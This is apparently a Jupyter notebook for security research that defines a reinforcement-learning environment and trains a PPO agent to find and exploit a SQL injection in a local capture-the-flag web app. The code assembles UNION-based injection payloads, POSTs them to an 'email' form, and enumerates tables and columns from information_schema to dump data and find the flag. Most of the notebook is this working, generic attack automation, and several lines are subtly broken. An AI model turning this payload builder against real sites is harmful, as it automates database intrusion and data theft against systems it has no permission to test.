In [ ]:
import gym
from gym import spaces
import numpy as np
import numpy as np
import gym
from xmlrpc.client import ResponseError
import numpy as np
import gym
from gym import Env
from gym import spaces 
from gym.spaces import Discrete, Box
import requests
import random
import re
import stable_baselines3
import time 

from time import sleep
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import A2C, DQN, PPO

In [ ]:
# Generate the information_schema.TABLES default info

information_schema_default_tables = ("innodb_table_stats", "mysql", "information_schema", "performance_schema", "sys", "setup_metrics", "setup_meters")
information_schema_columns = "information_schemaColumns.txt"

# Needs renaming to default tables from information schema
information_schema_default_columns = []

f = open(information_schema_columns)

for _ in f:
    _ = _.replace("\n","")
    information_schema_default_columns.append(_)
    
information_schema_default_columns.append("setup_metrics")
information_schema_default_columns.append("setup_meters")

In [ ]:
flags_found = []

In [ ]:
class SQLiEnv(gym.Env):
    def __init__(self):
        self.url = "http://localhost:8000/index.php" # This is the URL for the web application.   
        self.header = {'User-Agent': 'Mozilla/5.0, RL-CTF'} # A default header for interacting with web forms
        self.interaction_form_name = "email" # This is the hard coded vulnerable HTML form input
        
        self.action_space = spaces.Discrete(7)  # See above for abstract 
        
        self.observation_space = spaces.Box(low=0, high=1, shape=(33,), dtype=np.float32)
        
        self.numberOfActionsTotal = 0
        
        self.loseLife = False
        
        self.log = ''
        
    def reset(self):
        
        self.lives = 3
        
        self.done = False 
        
        self.sqlStatement = ""
        self.payload = ""
        self.unionStatement = " UNION ALL SELECT "
        self.nullStatement = ""
        self.columnStatement = ""
        self.escapeStatement = ""
        self.commentStatement = ""
        self.tableStatement = ""
        self.fromStatement = ""
        self.tables = [""]
        
        
        
        self.enumerateColumns = ""
        self.tryColumns = ""
        
        self.columns = [""]
        self.HTMLRESPONSE = [""]
        self.outofBounds = False
        self.outofActions = False
        self.sqlInjectionFound = False
        
        self.tableUsed = 0
        self.tableChosen = self.tables[self.tableUsed]
        self.normalisedTable = 0
        #self.columnChecker = self._find_columns()
        
        self.columnsFound = False
        self.currentColumns = False
        
        self.tablesFound = False
        self.flagFound = False
        
        self.columnDict = {}
        
        self.additionalColumn = False
        
        
        self.columnsUsed = 0
        self.tablesFound = 0
        
        self.maxColumns = 3
        
        if self.loseLife == True:
            self.score = self.score
            self.numberOfActionsTotal = self.numberOfActionsTotal
            self.totalActions = self.totalActions
        else:
            self.score = 0
            
        self.totalActions = 100
        
        self.tableReward = []
        self.columnReward = []
        
        self.index = 0
        self.actionHistory = [0] * 5
        self.observationIndex = 27 # For the previous action history
        
        
        self.log = ''
        
        print("\n ### Resetting ### \n")
        
        return self._get_obs()
    
    def step(self, action):
        
        self.loseLife = False
        
        previous_payload = self.payload
        
        self.additionalColumn = False
        
        print("\n")
        
        
        self.score -=1
        
        self.numberOfActionsTotal +=1  # Debugging total actions used
        
        self.totalActions -=1
        
        #print("Debug Action - ", self.numberOfActionsTotal)
        
        #print("Total Actions", self.totalActions)
        
        # Debugging - print("\n", "New Action", self.numberOfActionsTotal)
        
        self.columnsUsed = self.payload.count("CONCAT") # Calculate the current amount of columns used
        
        ''' 
        # Debugging actions: enable for testing actions
        
        '''
        # Debugging actions
        '''
        if self.numberOfActionsTotal == 1:
            action = 2
            
            print("ACTION IS: ", action)
            
        if self.numberOfActionsTotal == 2:
            action = 3
            print("ACTION IS: ", action)
            
        if self.numberOfActionsTotal == 3:
            action = 2
            print("ACTION IS: ", action)
        
        
        if self.numberOfActionsTotal == 4:
            action = 3
            print("ACTION IS: ", action) 
        
        elif self.numberOfActionsTotal == 5:
            action = 2
            
        elif self.numberOfActionsTotal == 6:
            action = 5
            
        elif self.numberOfActionsTotal == 7:
            action = 6
            
        elif self.numberOfActionsTotal == 8:
            action = 4
            
        elif self.numberOfActionsTotal == 9:
            action = 4
            
        elif self.numberOfActionsTotal == 10:
            action = 5
            
        elif self.numberOfActionsTotal == 11:
            action = 6
        '''
        
        self.tableChosen = self.tables[self.tableUsed] # Define the current table (if any) to use
        
        '''
        # Actions
        
        '''
        
        # Actions
        if action == 0: # Change escape 
            
            print("# Action - Change Escape")
            
            self.escapeStatement = "' "
            update = self._updatePayload(action)
            
            
            
        if action == 1: # Change comment
            
            print("# Action - Change Comment")
            
            self.commentStatement = " -- c"
            update = self._updatePayload(action)

            
        if action == 2: # Enumerate table values
            
            print("# Action - Enumerate Table")
            
            self.tableStatement = ' CONCAT("##", table_name, "##") '
            
            self.fromStatement = ' from information_schema.tables '
            
            update = self._updatePayload(action)
            

            
        if action == 3: # Add a column
            
            print("# Action - Add Column")
            
            self.additionalColumn = True
            
            #self.columnsUsed +=1
            
            #self.columnsUsed = self.payload.count("CONCAT") # Calculate the current amount of columns used

            update = self._updatePayload(action)
            
            
        if action == 4: # change to different table
            
            print("# Action - Change Table")
            
            if len (self.tables) == 1:
                print("Invalid Action - No tables to change to")
                
            elif not (self.tableUsed + 1) >= len(self.tables):
                
                self.tableUsed +=1
                
                self.tableChosen = self.tables[self.tableUsed]
                
                update = self._updatePayload(action)
                
        if action == 5: # enumerate columns
            
            print("# Action - Enumerate columns")
            
            if len(self.tables) == 1:
                print("Invalid action - No tables found so no columns found")
                
            else:
                self.tableStatement = ' CONCAT("&&", column_name, "&&", table_name) '
                
                self.fromStatement =  ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)

                update = self._updatePayload(action)
                
        
            
        if action == 6: # try column values
            
            print("# Action - Try columns")
            
            if len(self.tables) == 1:
                print("Invalid action - Tables not available")
                
            if len(self.columns) == 1:
                print("Invalid action - Columns not available")
                
            else:
                
                update = self._updatePayload(action)
                
        #nullCleanup = self._remove_column(action)

        # Try exploit
        
        self.columnsUsed = self.payload.count("CONCAT") # Calculate the current amount of columns used

        print("COLUMNS USED - ", self.columnsUsed)
        
        self.exploit = {"email":"{}".format(self.payload)}
        self.HTMLRESPONSE = self._POST(self.exploit)

        findTables = self._find_tables()
        findColumns = self._find_columns()
        columnCheck = self._check_columns()
        
        print("Current Tables - ", self.tables)
        print("Current Columns - ", self.columns)
        print("Current dict - ", self.columnDict)
        print("Column Check value - ", columnCheck)
        
        normalisedAction = self._normalize(action)
        
        #print("Current Action", self.numberOfActionsTotal)
        
        addActionHistory = self._addActionHistory(normalisedAction)
        #self.normalisedTable = self._normalisedTable()
        
        print(action, self.payload)
        
        ### Final scoring and observation flags
        
            # Negative
        #if self.payload == previous_payload:
        #    print("Reusing previous payload")
        #    
        #    self.score -=1
        
            # Positive
            
        if action == 2:
            if self.tablesFound == True:
                self.score += 1
                
        if action == 5:
            if self.columnsFound == True:
                self.score +=1
            
        if "error in your SQL" in self.HTMLRESPONSE[0]:
            self.sqlInjectionFound = True
            
        if self.columnsFound == True:
            self.sqlInjectionFound = True
            
        if self.tablesFound == True:
            self.sqlInjectionFound = True
            
        if "different number of columns" in self.HTMLRESPONSE[0]:
            self.sqlInjectionFound = True
            
        if self.sqlInjectionFound == True:
            self.score +=0.5
        
        if "RL{" in self.HTMLRESPONSE[0]:
            print("!!!!!!!!!!!!!!!I have found the flag!!!!!!!!!!!")
            
            self.sqlInjectionFound = True
            
            self.score += 100
            
            flags_found.append("Y")
            
            self.done= True
            
        ### Termination States
        
        if self.columnsUsed == self.maxColumns: # Terminate episode if we go out of bounds of our maximum column value
            #print("Ending Early")
            
            print("\n", "#### OUT OF BOUNDS LOSE LIFE ####", "\n")
            self.outofBounds = True
            
            self.loseLife = True
            
            self.lives -=1
            
            if self.lives == 0:
                self.loseLife = False
                self.reset()
            
            self.score -=20
            
            self.reset()
            
        if self.totalActions == 0:
            print("Out of Actions")
            
            self.outofActions = True
            
            self.done= True
        
            
        reward = self.score
        
        print("TABLE TALLY - ", self.tableReward)
        
        observationDebugging = self._get_obs()
        
        print("Debugging State - ", observationDebugging, "Reward - ", reward)
        return self._get_obs(), reward, self.done, {}
    
    def _remove_column(self, action):
        currentColumns = self.payload.count("CONCAT")
        
        if self.additionalColumn == False:
            print("Addition column for this action is false")
            if action == 2 or action == 5 or action == 6:
                print("Parsing the null statement - ", currentColumns, self.previous_columns) 
                if currentColumns > self.previous_columns:
                    if 'CONCAT("NULL")' in self.nullStatement and ',CONCAT("NULL")' not in self.nullStatement:
                        self.nullStatement = self.nullStatement.replace('CONCAT("NULL")',"",1)
            
                    elif ',CONCAT("NULL")' in self.nullStatement:
                        self.nullStatement = self.nullStatement.replace('CONCAT("NULL")',"",1)
            
    
    def _find_tables(self):
        
        #print("Begin finding tables function")
        self.tablesFoundCheck = self.HTMLRESPONSE[0].count("##")
        
        if self.tablesFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]: 
            self.tablesFound = True
            
            if "T" not in self.tableReward:
                self.tableReward.append("T")
                
                self.score +=5
            
            tableString = re.findall("##(.*?)##", self.HTMLRESPONSE[0])
            
            for tableName in tableString:
                if tableName == "":
                    pass
                
                elif "table_name" in tableName:
                    pass 
                
                elif "column_name" in tableName:
                    pass
                
                else:
                
                    if tableName not in information_schema_default_columns:
                        if tableName not in self.tables:
                            if "" in self.tables:
                                self.tables.remove("")
                            if None in self.tables:
                                self.tables.remove(None)
                            self.tables.append(tableName)
                            
                            if tableName not in self.columnDict:
                                self.columnDict[tableName] = []
                                
        return self.tablesFound
    
    def _check_columns(self):
        
        #print("Debugging", self.tables[self.tableUsed])
        
        if self.tables[self.tableUsed] == '':
            print("No tables found to check columns")
            currentColumnCheck = ""
            
        else:
            currentColumnCheck = ""
            
            if len(str(self.columnDict[self.tables[self.tableUsed]])) >2 :
                print("Columns found for current table length: ", len(str(self.columnDict[self.tables[self.tableUsed]])))
                print("Columns found for current table", str(self.columnDict[self.tables[self.tableUsed]]), "####")
                self.currentColumns = True
                
                if "T" not in self.columnReward:
                    self.columnReward.append("T")
                
                    self.score +=5
                
                currentColumnCheck = str(self.columnDict[self.tables[self.tableUsed]])
                
        return currentColumnCheck
    
    def _find_columns(self):
        
        self.columnsFoundCheck = self.HTMLRESPONSE[0].count("&&")
        
        #print("COLUMNS CHECK DEBUG", self.columnsFoundCheck)
        
        if self.columnsFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]:
            self.columnsFound = True
            
           # print("Columns Found")
            
            columnString = re.findall("&&(.*?)&&", self.HTMLRESPONSE[0])
            
            columnDictKey = self.tables[self.tableUsed]
            columnDictValues = []
            
            for columnName in columnString:
                if columnName == "":
                    pass
                
                elif "column_name" in columnName:
                    pass
                
                elif "table_name" in columnName:
                    pass
                
                else:
                    
                    
                    if columnName not in self.tables:
                        
                        columnDictValues.append(columnName)
                    
                        if columnName not in self.columns:
                            self.columns.append(columnName)

                        if columnDictKey in self.columnDict:
                            self.columnDict[columnDictKey] = columnDictValues
                            
        return self.columnsFound
                
    def _updatePayload(self, action):
        
        
        if action == 0: # Add escape logic
            
                self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)

            
        elif action == 1: # Add comment logic
                self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)

                
        elif action == 2: # Enumerate table logic
            
            #if "column_name" not in self.payload:
            #    if "table_name" not in self.payload:
            #        self.columnsUsed +=1
                    
            #elif "table_name" not in self.payload:
            #    if "table_name" not in self.payload:
            #        self.columnsUsed +=1
               
            if 'CONCAT("NULL")' in self.nullStatement and ',CONCAT("NULL")' not in self.nullStatement:
                self.nullStatement = self.nullStatement.replace('CONCAT("NULL")',' ,CONCAT("NULL")', 1)
                
                    
            #if self.additionalColumn == True:
            #    self.nullStatement = self.nullStatement.replace(',CONCAT("NULL")',"",1)
                
            self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)
        
        elif action == 3: # add column logic
            
            print("Action 3 Debugging - Columns Used - ", self.columnsUsed)
            if self.columnsUsed == 0:
                
                print("0 Columns adding basic CONCAT")
                self.nullStatement = ' CONCAT("NULL") '
                self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)
                
            else:
                print("Multilple columns")
                self.nullStatement = self.nullStatement + ' ,CONCAT("NULL") '
                
                self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)
                
                print("Debugging Continued")
                
        elif action == 4:
            
            self.tableChosen = self.tables[self.tableUsed]
            
            if "COALESCE" in self.payload:
                self.fromStatement = " FROM {}".format(self.tableChosen)
                
            if "column_name" in self.payload:
                self.fromStatement =  ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)

                
                
            
            self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)

            
                
        elif action == 5:
            
            '''if "table_name" not in self.payload:
                if "column_name" not in self.payload:
                    
            elif "column_name" not in self.payload:dd
            '''
                    
            if 'CONCAT("NULL")' in self.nullStatement and ',CONCAT("NULL")' not in self.nullStatement:
                self.nullStatement = self.nullStatement.replace('CONCAT("NULL")',' ,CONCAT("NULL")', 1)
            
                
            self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)
        
        elif action == 6:
            
            if 'CONCAT("NULL")' in self.nullStatement and ',CONCAT("NULL")' not in self.nullStatement:
                self.nullStatement = self.nullStatement.replace('CONCAT("NULL")',' ,CONCAT("NULL")', 1)
 
            
            #if column_name not in self.payload or table_name not in self.payload:
            #    if ("COALESCE") not in self.payload:
            #        self.columnsUsed +=1
                
            listTest = []

            for _ in self.columnDict[self.tableChosen]:
                _ = 'COALESCE({}, "")'.format(_)
                listTest.append(_)

            listTest = str(listTest).replace("[","").replace("]","").replace("'","")
            
            self.tableStatement = " CONCAT({}) ".format(listTest)
            self.fromStatement = " FROM {}".format(self.tableChosen)
            self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)
    
        #else:
        #        self.tableStatement = ' CONCAT("&&", column_name, "&&", table_name) '
        #        self.fromStatement = ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
        #        self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.fromStatement, self.commentStatement)

    def _GET(self):
        try:
            # GET request using the url and custom header
            response = requests.get(self.url, headers=self.header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e

    # This function is for the HTTP POST requests for submitting our SQL injection payloads
    def _POST(self, exploit):
        try:
            # Send the url, header and data containing the payload. This is found in the custom environment
            # Search for "exploit" in the custom environment to find this part 
            response = requests.post(self.url, headers=self.header, data=exploit)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e 
            
        
            
        #if action == 2:
        #    if self.tableStatement not in self.payload:
        #        self.payload = "{} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.commentStatement)
        
        return self.payload 
    
    def _normalize(self, chosenAction):
        max_val = 10
        normalized_values = chosenAction / max_val
        #print("ORIGINAL", chosenAction, "NORMALISED", normalized_values)
        return normalized_values
    
    def _normalisedTable(self):
        max_val = 10
        normalized_tables = self.tableUsed / max_val
        return normalized_tables
        

    # Function to add items to the list and maintain its size at 10
    def _addActionHistory(self, chosenAction):
        self.actionHistory[self.index] = chosenAction
        #self.index = (self.index + 1) % 10  # Update index in a circular manner
        new_item = _
        self.index +=1
        
        if self.index == 5:
            self.index = 0
    
    def _get_obs(self):
        obs = np.zeros(33)
        
            
        if self.sqlInjectionFound == True: # If SQL injection is found based on a returned website response
        
            obs[0] = 1
            
        if self.escapeStatement == "":
            obs[1] = 1
        
        if self.escapeStatement == "' ":
            obs[2] = 1
            
        if self.escapeStatement == '" ':
            obs[3] = 1
            
        if self.commentStatement == "":
            obs[4] = 1
            
        if self.commentStatement == " -- c":
            obs[5] = 1
            
        if self.commentStatement == " # c":
            obs[6] = 1
            
        if self.commentStatement == " /* c":
            obs[7] = 1
            
        obs[8 + self.columnsUsed] = 1 # Which column used value in the array. For example if none then index 8 = 1
        
        if self.tablesFound == True:
            obs[19] = 1
            
            print("Current tables obs - ", obs[19])
        
        
        
        if self.currentColumns == True:
            obs[20] = 1
            
            print("Current Columns Obs - ", obs[20])
            
        obs[21] == self.normalisedTable
        
        if self.flagFound == True:
            obs[22] = 1
            
            print("Flag Found Obs - ", obs[22])
            
        if self.outofBounds == True:
            obs[24] = 1
            
        if self.outofActions == True:
            obs[25] = 1
            
        #obs[26] = self.normalisedHTMLLength
        
        for _ in self.actionHistory:
            #print(self.observationIndex)
            #print("Index value", self.observationIndex)
            obs[self.observationIndex] = _
            self.observationIndex +=1
            
        self.observationIndex = 27
            
        return obs
            
    def render(self, mode=None):
        print(self.log)
        self.log = ''
        
        

In [ ]:
from stable_baselines3.common.env_checker import check_env

env = SQLiEnv()

check_env(env, warn=True)

In [ ]:
env = SQLiEnv()

model = PPO("MlpPolicy", env, verbose=1, n_steps=100000)
model.learn(total_timesteps=100000)
    

In [ ]:
print(flags_found)

In [ ]:
env = SQLiEnv()
obs = env.reset()
for i in range(1000):
    action, _states = model.predict(obs)
    obs, rewards, dones, info = env.step(action)
        
    env.render()

In [ ]:
print(flags_found)